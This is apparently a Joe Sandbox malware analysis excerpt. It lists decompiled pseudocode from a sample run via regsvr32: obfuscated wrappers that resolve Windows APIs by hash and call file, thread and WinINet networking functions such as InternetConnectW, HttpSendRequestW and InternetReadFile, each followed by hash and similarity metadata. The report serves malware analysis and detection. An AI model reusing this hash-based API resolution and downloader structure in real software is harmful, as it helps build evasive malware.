                                                                                                                				_v8 = 0xb183e3;
                                                                                                                				_v8 = _v8 * 0x28;
                                                                                                                				_v8 = _v8 | 0x77f20d23;
                                                                                                                				_v8 = _v8 ^ 0x7ff151f0;
                                                                                                                				E00247F78(__ecx, 0xbd3f148a, __ecx, 0x32, __ecx, 0xc1451b2a);
                                                                                                                				_t39 = LoadLibraryW(_t43); // executed
                                                                                                                				return _t39;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID: fW6%
                                                                                                                • API String ID: 1029625771-2497841860
                                                                                                                • Opcode ID: e9a96777d647297eb512e53d93b70e0f178870901659e9c10e62ae6a590f0ec8
                                                                                                                • Instruction ID: a982589cdbc7681f199d8aa9261e642a7fc14e557b2ea82d30fcc862ebef3efb
                                                                                                                • Opcode Fuzzy Hash: e9a96777d647297eb512e53d93b70e0f178870901659e9c10e62ae6a590f0ec8
                                                                                                                • Instruction Fuzzy Hash: 90114871C11208FFCB08DFA8DA469DEBBB4EF00311F60C188E415B6251D3704B148F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 53%
                                                                                                                			E0025A50A(void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, long _a16, intOrPtr _a20, intOrPtr _a24, long _a28, intOrPtr _a36, long _a40, intOrPtr _a44, WCHAR* _a48) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				struct _SECURITY_ATTRIBUTES* _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t54;
                                                                                                                				void* _t65;
                                                                                                                				signed int _t66;
                                                                                                                				signed int _t67;
                                                                                                                
                                                                                                                				_push(_a48);
                                                                                                                				_push(_a44);
                                                                                                                				_push(_a40);
                                                                                                                				_push(_a36);
                                                                                                                				_push(0);
                                                                                                                				_push(_a28);
                                                                                                                				_push(_a24);
                                                                                                                				_push(_a20);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(0);
                                                                                                                				E0024C98A(_t54);
                                                                                                                				_v28 = 0xdc14f8;
                                                                                                                				_v24 = 0xd964fd;
                                                                                                                				_v20 = 0;
                                                                                                                				_v16 = 0xcfd091;
                                                                                                                				_v16 = _v16 << 0x10;
                                                                                                                				_v16 = _v16 << 8;
                                                                                                                				_v16 = _v16 ^ 0x910ec0c9;
                                                                                                                				_v12 = 0x7a2ff2;
                                                                                                                				_t66 = 0x43;
                                                                                                                				_v12 = _v12 / _t66;
                                                                                                                				_v12 = _v12 | 0xd721c1d7;
                                                                                                                				_v12 = _v12 ^ 0xd727192a;
                                                                                                                				_v8 = 0x1eb7c0;
                                                                                                                				_v8 = _v8 ^ 0x33199484;
                                                                                                                				_t67 = 0x2d;
                                                                                                                				_v8 = _v8 * 0xa;
                                                                                                                				_v8 = _v8 / _t67;
                                                                                                                				_v8 = _v8 ^ 0x05a21ecf;
                                                                                                                				E00247F78(_t67, 0xbd3f148a, _t67, 0x203, _t67, 0x939ae237);
                                                                                                                				_t65 = CreateFileW(_a48, _a28, _a40, 0, _a4, _a16, 0); // executed
                                                                                                                				return _t65;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,?,?,00000000,D727192A,00D964FD,00000000), ref: 0025A5E4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 94ead876fc1aef2e2499bc308fb4383a45bc4f9d75301f7fd0bd61c27d4a56db
                                                                                                                • Instruction ID: c49928cc00e96ae1e7d0195f7e5f6324601b84b2bc4415d4ff80407b1e675917
                                                                                                                • Opcode Fuzzy Hash: 94ead876fc1aef2e2499bc308fb4383a45bc4f9d75301f7fd0bd61c27d4a56db
                                                                                                                • Instruction Fuzzy Hash: FE21C372901108FBDF05DFE9D94A9DEBFB6EF48314F508149FA1866260D3728A609F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 62%
                                                                                                                			E002519B1(void* __ecx, DWORD* __edx, intOrPtr _a4, intOrPtr _a8, long _a12, void* _a16, void* _a20, intOrPtr _a24) {
                                                                                                                				unsigned int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				void* _t50;
                                                                                                                				int _t63;
                                                                                                                				signed int _t65;
                                                                                                                				signed int _t66;
                                                                                                                				DWORD* _t74;
                                                                                                                
                                                                                                                				_push(_a24);
                                                                                                                				_t74 = __edx;
                                                                                                                				_push(_a20);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				E0024C98A(_t50);
                                                                                                                				_v32 = 0xd7d875;
                                                                                                                				asm("stosd");
                                                                                                                				asm("stosd");
                                                                                                                				_t65 = 0x3d;
                                                                                                                				asm("stosd");
                                                                                                                				_v16 = 0x1eee3f;
                                                                                                                				_v16 = _v16 * 0x6e;
                                                                                                                				_t66 = 0x22;
                                                                                                                				_v16 = _v16 / _t65;
                                                                                                                				_v16 = _v16 << 0xc;
                                                                                                                				_v16 = _v16 ^ 0x7c61f49b;
                                                                                                                				_v12 = 0xffced1;
                                                                                                                				_v12 = _v12 << 0xd;
                                                                                                                				_v12 = _v12 / _t66;
                                                                                                                				_v12 = _v12 + 0x3034;
                                                                                                                				_v12 = _v12 ^ 0x07583177;
                                                                                                                				_v8 = 0xa5d24e;
                                                                                                                				_v8 = _v8 * 0x37;
                                                                                                                				_v8 = _v8 << 3;
                                                                                                                				_v8 = _v8 >> 0xf;
                                                                                                                				_v8 = _v8 ^ 0x0005d302;
                                                                                                                				E00247F78(_t66, 0x2da3a2fe, _t66, 0x239, _t66, 0xd169d23b);
                                                                                                                				_t63 = InternetReadFile(_a16, _a20, _a12, _t74); // executed
                                                                                                                				return _t63;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • InternetReadFile.WININET(D40CEA05,AAAB0961,007F5AF6,?,?,?,?,?,?,?,?,?,?,?,?,00CC5ADE), ref: 00251A7B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileInternetRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 778332206-0
                                                                                                                • Opcode ID: 9e02c36ec2ea3d9a539f4ca0ab1df4be54585172182fefbaf7bb3921e4b3c2ef
                                                                                                                • Instruction ID: 1c983ea7d7a2e91e8309219ff8b53fa62501d00f21b81c4632a613e56a2186ce
                                                                                                                • Opcode Fuzzy Hash: 9e02c36ec2ea3d9a539f4ca0ab1df4be54585172182fefbaf7bb3921e4b3c2ef
                                                                                                                • Instruction Fuzzy Hash: BC214271D01209BBEF05DFA5C84A8DEBBB5EF88310F108089EA14A6260D2759B25DF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 43%
                                                                                                                			E00248D7E(void* __ecx, void* __edx, signed int _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16, intOrPtr _a36, intOrPtr _a40, void* _a44, intOrPtr _a48, long _a52) {
                                                                                                                				unsigned int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				void* _t48;
                                                                                                                				signed int _t50;
                                                                                                                				short _t59;
                                                                                                                
                                                                                                                				_push(_a52);
                                                                                                                				_t59 = _a4;
                                                                                                                				_push(_a48);
                                                                                                                				_push(_a44);
                                                                                                                				_push(_a40);
                                                                                                                				_push(_a36);
                                                                                                                				_push(0);
                                                                                                                				_push(0);
                                                                                                                				_push(0);
                                                                                                                				_push(0);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_t59 & 0x0000ffff);
                                                                                                                				E0024C98A(_t59 & 0x0000ffff);
                                                                                                                				_v12 = 0xd2122c;
                                                                                                                				_v12 = _v12 << 0x10;
                                                                                                                				_v12 = _v12 ^ 0x122deedf;
                                                                                                                				_v8 = 0x7b7f1e;
                                                                                                                				_v8 = _v8 >> 0xb;
                                                                                                                				_v8 = _v8 ^ 0x0006052b;
                                                                                                                				_a4 = 0x98292d;
                                                                                                                				_t50 = 0x66;
                                                                                                                				_a4 = _a4 / _t50;
                                                                                                                				_a4 = _a4 + 0xb264;
                                                                                                                				_a4 = _a4 ^ 0x000e6cb3;
                                                                                                                				E00247F78(_t50, 0x2da3a2fe, _t50, 0xb6, _t50, 0x1be04906);
                                                                                                                				_t48 = InternetConnectW(_a44, _a12, _t59, 0, 0, _a52, 0, 0); // executed
                                                                                                                				return _t48;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • InternetConnectW.WININET(?,?,?,00000000,00000000,?,00000000,00000000), ref: 00248E30
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ConnectInternet
                                                                                                                • String ID:
                                                                                                                • API String ID: 3050416762-0
                                                                                                                • Opcode ID: e0d9d98b93de7f7e4fb9637a38f7f4dd4b562b5cb5810bcbc41addd9e23cc2e4
                                                                                                                • Instruction ID: b48d31c57ae4c16a2877a42bd048bfa3591c5da4d89a852902e9bb6de3c1f825
                                                                                                                • Opcode Fuzzy Hash: e0d9d98b93de7f7e4fb9637a38f7f4dd4b562b5cb5810bcbc41addd9e23cc2e4
                                                                                                                • Instruction Fuzzy Hash: A7211372500248BFDF259F96CC49CDF3FBAEB85750F508048F9085A210D3B29AA0DBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 41%
                                                                                                                			E0025660B(void* __ecx, intOrPtr _a4, DWORD* _a8, WCHAR* _a12, intOrPtr _a16, intOrPtr _a28, intOrPtr _a32, intOrPtr _a44, intOrPtr _a48) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t37;
                                                                                                                				int _t44;
                                                                                                                
                                                                                                                				_push(0);
                                                                                                                				_push(_a48);
                                                                                                                				_push(_a44);
                                                                                                                				_push(0);
                                                                                                                				_push(0);
                                                                                                                				_push(_a32);
                                                                                                                				_push(_a28);
                                                                                                                				_push(0);
                                                                                                                				_push(0);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(0);
                                                                                                                				_push(__ecx);
                                                                                                                				E0024C98A(_t37);
                                                                                                                				_v12 = 0x7ec57e;
                                                                                                                				_v12 = _v12 >> 3;
                                                                                                                				_v12 = _v12 * 0x2c;
                                                                                                                				_v12 = _v12 | 0x8e944971;
                                                                                                                				_v12 = _v12 ^ 0x8eb1fb2a;
                                                                                                                				_v8 = 0x400445;
                                                                                                                				_v8 = _v8 | 0xf6942acb;
                                                                                                                				_v8 = _v8 + 0xffff66f5;
                                                                                                                				_v8 = _v8 + 0xc505;
                                                                                                                				_v8 = _v8 ^ 0xf6dddebf;
                                                                                                                				_v16 = 0xb4df02;
                                                                                                                				_v16 = _v16 | 0x9b23471b;
                                                                                                                				_v16 = _v16 ^ 0x9bb88961;
                                                                                                                				E00247F78(__ecx, 0xbd3f148a, __ecx, 0x19b, __ecx, 0xdb130bf3);
                                                                                                                				_t44 = GetVolumeInformationW(_a12, 0, 0, _a8, 0, 0, 0, 0); // executed
                                                                                                                				return _t44;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • GetVolumeInformationW.KERNEL32(00000000,00000000,00000000,9BB88961,00000000,00000000,00000000,00000000), ref: 002566C1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: InformationVolume
                                                                                                                • String ID:
                                                                                                                • API String ID: 2039140958-0
                                                                                                                • Opcode ID: d2215fb55f35b44b42a2f1637041b806ed3b48c34490f52af52fad1fca9b8d85
                                                                                                                • Instruction ID: a0550c4838eb5cc6c8de35d1a8790b980d68e3601e3dbabd697c429417d57131
                                                                                                                • Opcode Fuzzy Hash: d2215fb55f35b44b42a2f1637041b806ed3b48c34490f52af52fad1fca9b8d85
                                                                                                                • Instruction Fuzzy Hash: A911D676802218BBCF259FA1DD4ACCFBF79EF05364F108188F91966160D3729A65DFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 55%
                                                                                                                			E00250231(void* __ecx, intOrPtr _a4, _Unknown_base(*)()* _a12, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				struct _SECURITY_ATTRIBUTES* _v20;
                                                                                                                				struct _SECURITY_ATTRIBUTES* _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t30;
                                                                                                                				void* _t37;
                                                                                                                				void* _t41;
                                                                                                                
                                                                                                                				_push(_a32);
                                                                                                                				_t41 = __ecx;
                                                                                                                				_push(_a28);
                                                                                                                				_push(_a24);
                                                                                                                				_push(0);
                                                                                                                				_push(0);
                                                                                                                				_push(_a12);
                                                                                                                				_push(0);
                                                                                                                				_push(_a4);
                                                                                                                				_push(0);
                                                                                                                				_push(__ecx);
                                                                                                                				E0024C98A(_t30);
                                                                                                                				_v28 = 0x2596c2;
                                                                                                                				_v24 = 0;
                                                                                                                				_v20 = 0;
                                                                                                                				_v8 = 0x22d05a;
                                                                                                                				_v8 = _v8 << 4;
                                                                                                                				_v8 = _v8 + 0x62c6;
                                                                                                                				_v8 = _v8 ^ 0x02256f7e;
                                                                                                                				_v16 = 0x48319a;
                                                                                                                				_v16 = _v16 << 7;
                                                                                                                				_v16 = _v16 ^ 0x241be9eb;
                                                                                                                				_v12 = 0x1eaef8;
                                                                                                                				_v12 = _v12 * 0x46;
                                                                                                                				_v12 = _v12 ^ 0x0865d673;
                                                                                                                				E00247F78(__ecx, 0xbd3f148a, __ecx, 0x144, __ecx, 0x23817b4e);
                                                                                                                				_t37 = CreateThread(0, 0, _a12, _t41, 0, 0); // executed
                                                                                                                				return _t37;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,F7F93CBA,2B51E95D,00000000,00000000), ref: 002502D0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2422867632-0
                                                                                                                • Opcode ID: febb2ce9b64f113a162a702ad8056895185b9551f67a8038cf5dff4911d7ecf9
                                                                                                                • Instruction ID: 3abb49911e8a675b640ccce278aae87c6b8f1736d0fe869e9d74905567255f97
                                                                                                                • Opcode Fuzzy Hash: febb2ce9b64f113a162a702ad8056895185b9551f67a8038cf5dff4911d7ecf9
                                                                                                                • Instruction Fuzzy Hash: 331155B1C01248BB8B15DF9ACD49C9FBFB8EF85704F108089F81462220C3B14B28CFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 62%
                                                                                                                			E00243129(void* __ecx, void* __edx, long _a8, intOrPtr _a12, WCHAR* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                				signed int _v8;
                                                                                                                				unsigned int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				void* _t36;
                                                                                                                				int _t42;
                                                                                                                				void* _t46;
                                                                                                                				void* _t47;
                                                                                                                
                                                                                                                				_push(_a28);
                                                                                                                				_t46 = __edx;
                                                                                                                				_t47 = __ecx;
                                                                                                                				_push(_a24);
                                                                                                                				_push(_a20);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(0xffffffff);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E0024C98A(_t36);
                                                                                                                				_v20 = _v20 & 0x00000000;
                                                                                                                				_v32 = 0xfcf8f0;
                                                                                                                				_v28 = 0xa842d3;
                                                                                                                				_v24 = 0x92bf57;
                                                                                                                				_v16 = 0x769510;
                                                                                                                				_v16 = _v16 | 0x065b578e;
                                                                                                                				_v16 = _v16 ^ 0x0674ffbb;
                                                                                                                				_v12 = 0x9cdd07;
                                                                                                                				_v12 = _v12 ^ 0xe2ef1acf;
                                                                                                                				_v12 = _v12 >> 4;
                                                                                                                				_v12 = _v12 ^ 0x0e201782;
                                                                                                                				_v8 = 0xcfed52;
                                                                                                                				_v8 = _v8 + 0x9fc7;
                                                                                                                				_v8 = _v8 ^ 0xd0525774;
                                                                                                                				_v8 = _v8 ^ 0xd08905a6;
                                                                                                                				E00247F78(__ecx, 0x2da3a2fe, __ecx, 0xca, __ecx, 0x4b0b20d0);
                                                                                                                				_t42 = HttpSendRequestW(_t46, _a16, 0xffffffff, _t47, _a8); // executed
                                                                                                                				return _t42;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • HttpSendRequestW.WININET(?,0092BF57,000000FF,?,0674FFBB), ref: 002431E2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: HttpRequestSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 360639707-0
                                                                                                                • Opcode ID: bfd086e1c35cf3ab1ccafcfe5f21c18e7a5a2bf4b624eaa4f09f98e4cb5a84df
                                                                                                                • Instruction ID: e61142729b53d83bda458836a77ef930da71b7d518d43c6ec3bdbc54224e36a6
                                                                                                                • Opcode Fuzzy Hash: bfd086e1c35cf3ab1ccafcfe5f21c18e7a5a2bf4b624eaa4f09f98e4cb5a84df
                                                                                                                • Instruction Fuzzy Hash: 31116771C0520CBBCF059FA4880A9DEBFB1EF44324F208298F925662A1D3758A24DF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00243466(void* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                                                                				unsigned int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				unsigned int _v16;
                                                                                                                				void* _t29;
                                                                                                                				intOrPtr* _t35;
                                                                                                                				void* _t36;
                                                                                                                				void* _t41;
                                                                                                                
                                                                                                                				_t41 = __ecx;
                                                                                                                				E0024C98A(_t29);
                                                                                                                				_v8 = 0x88f6ec;
                                                                                                                				_v8 = _v8 | 0x6177bf25;
                                                                                                                				_v8 = _v8 >> 0xb;
                                                                                                                				_v8 = _v8 + 0x167f;
                                                                                                                				_v8 = _v8 ^ 0x0004f919;
                                                                                                                				_v16 = 0x9ca171;
                                                                                                                				_v16 = _v16 >> 8;
                                                                                                                				_v16 = _v16 ^ 0x0005b7ae;
                                                                                                                				_v12 = 0xf5b080;
                                                                                                                				_v12 = _v12 * 0x58;
                                                                                                                				_v12 = _v12 ^ 0x54793a02;
                                                                                                                				_t35 = E00247F78(__ecx, 0xffc5979d, __ecx, 0xcc, __ecx, 0x31e1b46b);
                                                                                                                				_t36 =  *_t35(0, _t41, 0, 0, _a12, __ecx, __edx, 0, 0, _a12, _a16, 0, _a24, _a28, _a32); // executed
                                                                                                                				return _t36;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 002434FE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FolderPath
                                                                                                                • String ID:
                                                                                                                • API String ID: 1514166925-0
                                                                                                                • Opcode ID: 13f768f001924c624068fd7892d91b4b7d53848237674a523edb96abd7f13e84
                                                                                                                • Instruction ID: b4418204eb179a3867fc00cf27fe79142436937f0d49a5600408e3cdb9a84c9d
                                                                                                                • Opcode Fuzzy Hash: 13f768f001924c624068fd7892d91b4b7d53848237674a523edb96abd7f13e84
                                                                                                                • Instruction Fuzzy Hash: 56113671805248BBCB15DFA6DD0ACAFBFB8EB85704F108098F914A2210D3714B24DF61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 58%
                                                                                                                			E0025EE14(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                				signed int _v8;
                                                                                                                				unsigned int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t36;
                                                                                                                				intOrPtr* _t44;
                                                                                                                				void* _t45;
                                                                                                                				signed int _t47;
                                                                                                                				void* _t52;
                                                                                                                
                                                                                                                				_t52 = __ecx;
                                                                                                                				E0024C98A(_t36);
                                                                                                                				_v20 = _v20 & 0x00000000;
                                                                                                                				_v28 = 0x925fd5;
                                                                                                                				_v24 = 0x3b904c;
                                                                                                                				_v16 = 0x6d30de;
                                                                                                                				_t47 = 0x5b;
                                                                                                                				_v16 = _v16 * 0x60;
                                                                                                                				_v16 = _v16 ^ 0x28ff8dcb;
                                                                                                                				_v12 = 0xbfa3c2;
                                                                                                                				_v12 = _v12 >> 5;
                                                                                                                				_v12 = _v12 ^ 0x00027e76;
                                                                                                                				_v8 = 0xee0b6c;
                                                                                                                				_v8 = _v8 + 0xffffa39f;
                                                                                                                				_v8 = _v8 + 0xffff7139;
                                                                                                                				_v8 = _v8 / _t47;
                                                                                                                				_v8 = _v8 ^ 0x000127e6;
                                                                                                                				_t44 = E00247F78(_t47, 0xbd3f148a, _t47, 0xa8, _t47, 0xf59140c4);
                                                                                                                				_t45 =  *_t44(_a8, _t52, __ecx, __edx, _a4, _a8, _a12, _a16); // executed
                                                                                                                				return _t45;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • ProcessIdToSessionId.KERNEL32(28FF8DCB,00000000,?,?,?,?,?,?,?,?,?,030CEBA0), ref: 0025EEBB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ProcessSession
                                                                                                                • String ID:
                                                                                                                • API String ID: 3779259828-0
                                                                                                                • Opcode ID: f62aea174aed0786bad1caf595a948cb0f869b04c5dc3c446b3cefd37749493c
                                                                                                                • Instruction ID: 4b1031d002c60d154d4389a181b2c18e947627bb995bc615993e5227f48361dd
                                                                                                                • Opcode Fuzzy Hash: f62aea174aed0786bad1caf595a948cb0f869b04c5dc3c446b3cefd37749493c
                                                                                                                • Instruction Fuzzy Hash: 261158B6D0521CFBCF04DFA9D906ADEBBB1EF44314F208198E91466250E3B15F149F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 72%
                                                                                                                			E00243506(void* __ecx, void* __edx, void* _a4, long _a8, intOrPtr _a12, long _a16, intOrPtr _a20) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t39;
                                                                                                                				void* _t47;
                                                                                                                				signed int _t49;
                                                                                                                
                                                                                                                				_push(_a20);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				E0024C98A(_t39);
                                                                                                                				_v16 = 0xf4e2fc;
                                                                                                                				_t49 = 0x3b;
                                                                                                                				_v16 = _v16 / _t49;
                                                                                                                				_v16 = _v16 ^ 0x00083f87;
                                                                                                                				_v12 = 0x549d10;
                                                                                                                				_v12 = _v12 << 0xd;
                                                                                                                				_v12 = _v12 + 0xffff8515;
                                                                                                                				_v12 = _v12 | 0x9f85c2ad;
                                                                                                                				_v12 = _v12 ^ 0x9fa0e66d;
                                                                                                                				_v8 = 0xbeaf63;
                                                                                                                				_v8 = _v8 | 0x7acbe5f7;
                                                                                                                				_v8 = _v8 << 0xf;
                                                                                                                				_v8 = _v8 ^ 0x3b62dfe8;
                                                                                                                				_v8 = _v8 ^ 0xcc9b72fd;
                                                                                                                				E00247F78(_t49, 0xbd3f148a, _t49, 0x106, _t49, 0xba07f621);
                                                                                                                				_t47 = RtlAllocateHeap(_a4, _a16, _a8); // executed
                                                                                                                				return _t47;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(9FA0E66D,?,00083F87), ref: 002435AB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
